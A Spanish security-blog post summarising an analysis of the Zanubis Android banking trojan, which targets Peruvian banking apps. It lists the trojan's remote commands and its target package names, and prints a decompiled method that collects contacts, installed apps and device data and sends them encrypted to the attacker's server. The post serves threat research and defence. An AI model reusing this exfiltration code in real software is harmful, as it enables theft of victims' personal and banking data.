Nuestro compañero y amigo Fernando Diaz ha realizado una investigación sobre una muestra que se encontró en el Twitter de MHT, la ha bautizado como Zanubis dado que la clave de descifrado es «Zanubis». La investigación trata los IOC, SHA256 y entidades bancarias especificas.
En el momento de escribir este artículo, las muestras no estaban empaquetadas y aún contenían registros de los autores. Es probable que estas muestras aún no sean versiones finales.
El troyano
Este es un troyano bancario basado en superposición que abusa de la accesibilidad, el método de infección es el estándar y almacena una lista de aplicaciones en shared_preferences. Está enfocado en bancos de Latinoamerica, esta muestra se enfoca especialmente, en bancos de Perú.
Al inicio, se llama al método ServerPrimerosPasos() y se recupera la siguiente información:
Lista de contactos del dispositivoLista de aplicaciones instaladasDatos del dispositivo que incluyen:fabricantemodelohuella dactilarComprueba la marca del dispositivo y comprueba específicamente los dispositivos Motorola, Samsung y Huawei.Ignora las optimizaciones de la batería.
Esta información se formatea y se envía al servidor remoto a través de websockets:
public void ServerPrimerosPasos() {
try {
String contactos = this.funciones.ObtenerContactos();
String apps = this.funciones.ObtenerApps();
String datosTelefono = this.dispositivo.ObtenerDatos();
String cont_res = «{ » + this.funciones.ObtenerIdCliente() + «, «contactos» : » + contactos + «, «apps» : » + apps + «, «device_info» : » + datosTelefono + » }»;
this.socket.emit(«datos_iniciales_cliente», str_encript(cont_res, this.config.KEY_STR));
} catch (Exception e) {
}
}
Resumen de Información y configuración
Una vez que la muestra se instala en el dispositivo de la víctima, utiliza la URL inicial codificada para publicar datos en un servidor remoto. Después de la primera publicación, las siguientes recibirán cadenas cifradas tanto del troyano como del servidor.
El paquete de vistas contiene todo el código relacionado con Views y WebViews, incluidas las pruebas y vistas personalizadas para solicitar los permisos de accesibilidad, SMS y batería. Los autores han dejado algunos comentarios de registro en la muestra.
La información se envía al servidor remoto a través del método NotificarPost
Las superposiciones funcionan al verificar la lista de paquetes para monitorear desde pref_config_package y luego lo verificará cada vez que se abra una aplicación
Si la aplicación está en la lista de objetivos, se superpondrá un WebView en el dispositivo de la víctima.
La clase llamada Configuración almacena la configuración por defecto de la muestra. La información más importante que se almacena aquí para nosotros es:
KEY_STR : Se usa para encriptar mensajes como se ve en las capturas de pantalla de ServerPrimerosPasos()URL_INICIAL : es la URL de inicio que se usa en onCreate dentro de WebView y habilita el contenido de JavascriptPREF_LLAVESOCKET_SERVER : Dirección remota para abrir un WebSocket. Este websocket expone los siguientes comandos:config_packages: Devuelve la lista de paquetes instalados en el sistemadesinstalar_app y eliminar_app: elimina la aplicación de destinobloquear_telefono: Bloquea la pantallanotificacion: Envía una notificación push al usuario. El mensaje se recibe del socket y se descifraenviar_sms: Envía un SMSpermiso_contacto: Solicita el permiso de los contactospermiso_sms: Obtener permiso de SMSrev_permiso_sms: Restablecer permiso de SMSunlock_package: permitir que se desinstale el paquete de destino
En la publicación de Fernando se muestran algunos fragmentos de código relacionados con los comandos anteriores, asi como fragmentos de código, descifrado, el gráfico de VT, IOCs, lectura más que recomendada, la investigación Troyano bancario Zanubis.
Entidades afectadas
pe.com.interbank.mobilebankingpe.com.scotiabank.blpm.android.clientpe.com.bn.app.bancodelanacioncom.mibanco.bancamovilpe.com.banBifBanking.icBanking.androidUIcom.bbva.nxt_perucom.bcp.innovacxion.yapeappper.bf.desacom.pe.cajasullana.cajamovilcom.bcp.bank.bcppe.pichincha.bmcom.cajahuancayo.cajahuancayo.appcajahuancayope.cajapiura.bancamovilcom.cmacica.prdpe.interbank.biepe.com.scotiabank.businessbankingcom.bcp.bank.tlccom.alfinbanco.appclientespe.com.bancomercio.mobilebankingcom.bm_gnb_pecom.whatsappcom.ripley.banco.perucom.zoluxiones.officebankingcom.cmac.cajamovilaqppe.com.cajametropolitana.homebankingcml.cmlhomebankingcom.pe.cajacusco.movilcom.caja.myapplicationcom.cajamaynas.cajamaynascom.cajatacna.droidcom.appcajatrujillope.com.tarjetacencosud.canales.mitarjetacencosudpe.com.cajacentrope.com.prymera.digital.apppe.com.compartamos.bancamovilpe.confianza.bancamovilid=com.credinkamovil.pepe.com.scotiabank.blpm.android.client.csfcom.efectivadigital.appclientespe.solera.tarjetaohcom.qapaq.bankingcom.google.android.gm
Más información:
Zanubis LATAM Banking Trojan https://www.entdark.net/2022/09/zanubis-latam-banking-trojan.html?spref=tw&m=1
VT Collection https://www.virustotal.com/gui/collection/1857e2a8e8677e5f0b0edb38dff9e83795cd50be1e4f8771e2d374f99e4edb45
La entrada Investigación Troyano bancario Zanubis LATAM se publicó primero en Una al Día.
